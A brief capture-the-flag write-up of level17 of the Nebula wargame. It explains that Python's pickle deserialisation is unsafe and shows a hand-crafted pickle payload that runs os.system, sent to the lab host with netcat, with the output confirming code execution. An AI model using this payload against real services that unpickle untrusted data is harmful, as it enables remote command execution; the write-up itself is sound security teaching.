In level17 of Nebula wargame, we have Python script. The type of vulnerability should be obvious as soon as we see “import pickle”.

Pickle is an object serialization module for Python. It has always been known to be insecure as there are no restrictions on the objects that are deserialized. There was a great presentation at Blackhat 2011 about Python shellcoding from SensePost. Here is the payload we will be using

kroosec@dojo:~$ cat pwn17
cos
system
(S’getflag > /tmp/pwnie17’
tR.

which is, when deserialized is equivalent to os.system(“getflag > /tmp/pwnie17”). We will send the exploit with netcat.

kroosec@dojo:~$ nc 192.168.56.101 10007 < pwn17
level17@nebula:~$ cat /tmp/pwnie17
You have successfully executed getflag on a target account